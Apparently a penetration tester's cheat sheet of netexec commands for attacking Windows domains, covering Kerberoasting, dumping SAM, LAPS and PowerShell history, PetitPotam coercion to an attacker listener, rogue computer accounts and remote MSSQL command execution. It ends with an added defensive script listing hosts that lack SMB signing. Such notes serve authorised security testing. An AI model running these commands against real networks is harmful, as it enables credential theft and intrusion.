# netexec (nxc)
[nxc](https://www.netexec.wiki/) "is a network service exploitation tool that helps automate assessing the security of large networks." Check out the BHIS [cheat sheet](https://www.blackhillsinfosec.com/netcat-cheatsheet/) on this topic.

## Generate a hosts file
```
nxc smb 10.3.10.0/24 --generate-hosts-file hosts.txt
```

### Append the generated hosts file to your actual /etc/hosts file
```
cat hosts.txt | sudo tee -a /etc/hosts
```
(`sudo cat hosts.txt >> /etc/hosts` fails with permission denied: the `>>` redirect is opened by your unprivileged shell, not by `sudo`, so `tee -a` under `sudo` is what actually does the appending.)

## Check for vulnerable certificates
```
nxc ldap domain.com -u user -p pass -M certipy-find
```

## Check Machine Account Quota (MAQ) value
```
nxc ldap domain.com -u user -p pass -M maq
```

## Basic SMB auth
```
nxc smb somehost -u user -p 'Winter2027!'
```

### Basic SMB auth (Kerberos)
I like to use [getTGT](/pentesting/Internal/gettgt.md), then `export KRB5CCNAME=user.ccache`, and then point nxc at the cached ticket. For example:

Connect to host with SMB:
```
nxc smb server.domain.com --use-kcache
```

## Turn on logging
To log every nxc command and output to a file, find the `nxc.conf` file (in my Kali it was at `/home/kali/.nxc/nxc.conf`) and enable logging:
```
log_mode = True
```

## Change the Pwn3d label
You can change that label to something more professional if you want: edit the `/home/kali/.nxc/nxc.conf` file and set:

```
pwn3d_label = Compromised!
```

## ASREPRoasting
```
nxc ldap dc1.domain.com -u you -p 'Arnold123!' --asreproast asrep.txt
```

## Kerberoasting
```
nxc ldap domain.com -u lowpriv -p JingleAllTheWay! --kerberoasting kerbs.txt
```

!!!tip
If you have a ton of Kerberoastable users, you can read them more easily by grepping the output down to just the usernames:

```
grep -oP '\$krb5tgs\$\d+\$\*\K[^$]+' kerbs.txt | tr '[:lower:]' '[:upper:]' | sort -fu
```
!!!

## Find shares
```
nxc smb pcs.txt -u 'username' -p 'password' --shares
```

### Filtering shares
For example, to list only the shares where you have READ or WRITE access:
```
nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares READ WRITE
```

Or just WRITE:

```
nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares WRITE
```

### Cleaning up share list from log file
If you've turned on logging (see the "Turn on logging" section above), here's a way to grep out just the shares you have WRITE access to. This is helpful if you want to try to drop tricky [farmer](/pentesting/Internal/farmer) payloads.

```
grep -i write log_2024-08-24-22-17-32.log | awk '{print $9,$10}' | sort > shares-i-can-write-to.txt
```

## Find hosts with/without SMB signing
```
nxc smb pcs.txt -u '' -p '' --gen-relay-list nosigning.txt
```

## Find hosts with/without SMB signing (alternate way)

### Save the scan output, then grep for hosts where signing is False
Run the scan once and save the output so you can grep it afterwards:
```
nxc smb pcs.txt -u '' -p '' > signingcheck.txt
```

If you want to get kind of fancy-pantsy, you can take the `grep` a step further by pulling out only the hosts with SMB signing disabled and sorting them by hostname (field 4 of nxc's output):

```
grep -i "signing:False" signingcheck.txt | sort -k4,4 > no-signing-for-these-folks.txt
```
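As an added example (not from this page or the nxc project), here is a small shell script that turns saved nxc SMB scan output, like the `signingcheck.txt` above, into a sorted hardening list. It finds the `(signing:..)` and `(SMBv1:..)` tokens by name instead of by column position; the sample lines are constructed here and assume nxc's console line format `SMB <ip> 445 <host> [*] <OS> (name:..) (domain:..) (signing:..) (SMBv1:..)`.

```shell
#!/bin/sh
# Added example, not from the page or the nxc project: build a remediation
# list from saved nxc SMB output. The sample lines are constructed and
# assume nxc's console format:
#   SMB <ip> 445 <host> [*] <OS> (name:..) (domain:..) (signing:..) (SMBv1:..)

# Write the constructed sample scan output to the file named in $1
# (stands in for signingcheck.txt).
make_sample_output() {
    cat > "$1" <<'EOF'
SMB         10.3.10.20      445    WS02             [*] Windows 10 Build 19041 x64 (name:WS02) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.3.10.5       445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.3.10.11      445    FS01             [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.3.10.9       445    APP03            [*] Windows Server 2022 Build 20348 x64 (name:APP03) (domain:corp.local) (signing:False) (SMBv1:False)
EOF
}

# Print one line per host: "<host> <ip> <signing> <SMBv1>", sorted by hostname.
# The (signing:..) and (SMBv1:..) tokens are located by name rather than by a
# fixed field number, so a longer OS string does not shift the columns.
smb_hardening_report() {
    awk '$1 == "SMB" {
        sig = "?"; v1 = "?"
        for (i = 5; i <= NF; i++) {
            if ($i ~ /^\(signing:/) { sig = $i; sub(/^\(signing:/, "", sig); sub(/\)$/, "", sig) }
            if ($i ~ /^\(SMBv1:/)   { v1 = $i;  sub(/^\(SMBv1:/, "", v1);   sub(/\)$/, "", v1) }
        }
        print $4, $2, sig, v1
    }' "$1" | sort -k1,1
}

# Hosts that do not require signing ("<host> <ip>"): the ones to fix first.
hosts_without_signing() {
    smb_hardening_report "$1" | awk '$3 == "False" { print $1, $2 }'
}

# Hosts still offering SMBv1, which should be disabled alongside enforcing signing.
hosts_with_smbv1() {
    smb_hardening_report "$1" | awk '$4 == "True" { print $1, $2 }'
}

# Stand-alone run: build the sample file, print the report, clean up.
sample=$(mktemp)
make_sample_output "$sample"
smb_hardening_report "$sample"
rm -f "$sample"
```

Point `smb_hardening_report` at your real saved output instead of the sample file to get the same four-column list for the hosts you scanned.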

## Find hosts running WebClient service
```
nxc smb somecomputer.domain.com -u lowpriv -p 'yerpassw0rd' -M webdav
```

## Find pre-created computer accounts
```
nxc ldap somecomputer.domain.com -u lowpriv -p 'winter2026' -M pre2k
```

## Dump SAM database
```
nxc smb VICTIM -u lowpriv -p 'Winter2026!' --sam
```

## Coerce authentication
The nxc [wiki](https://www.netexec.wiki/smb-protocol/scan-for-vulnerabilities) has an interesting page on this that covers the various ways nxc can coerce authentication.

:::note
Instead of using the METHOD option, you can use its short form M. Similarly, the argument LISTENER can be shortened to L.

This also applies to the names of the vulnerabilities when specifying a method.

```
M=p   // Invalid: both petitpotam and printerbug start with 'p', so the module gives an error
M=pr  // Matches printerbug
M=pe  // Matches petitpotam
M=dfs // Matches dfscoerce
```
:::

### Coerce via PetitPotam
```
nxc smb SOMEHOST -u user -p 'pass' -M coerce_plus -o LISTENER=MY.KALI.IP.ADDRESS METHOD=pe
```

## Add computer to the domain
```
nxc smb domain.com -u arnold -p JingleAllTheWay -M add-computer -o NAME=YOURMOM PASSWORD=Omglol123!
```

## MSSQL commands
*Lifted from the [nxc wiki](https://www.netexec.wiki/mssql-protocol/mssql-command)*

### Execute database commands
```
nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
```

### Get/put files
Get:
```
nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --get-file C:\\some\\file\\in-a-subdirectory\\file.txt /tmp/file
```

Put:
```
nxc mssql 192.168.212.134 -u administrator -p October2022 --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt
```

### Execute commands
```
nxc mssql 1.2.3.4 -u localdbuser -p 'Winter2026!' --local-auth -x 'dir c:\'
```

## Dump LAPS passwords
Using an account with rights to do so:

```
nxc smb VICTIMSERVER -u user-with-LAPS-reading-rights -p 'YerP4$$w0rd!' --laps
```

## Check LDAP channel binding
```
nxc ldap dc1.domain.com -u myuser -p 'MeowMeow123!' -M ldap-checker
```

## Dump PowerShell history
```
nxc smb 192.168.1.5 -u user -p password -M powershell_history -o export=True
```

## See who's logged in
```
nxc smb 192.168.7.7 -u user -p password --qwinsta
```

## List running tasks
```
nxc smb 192.168.7.7 -u user -p password --tasklist
```
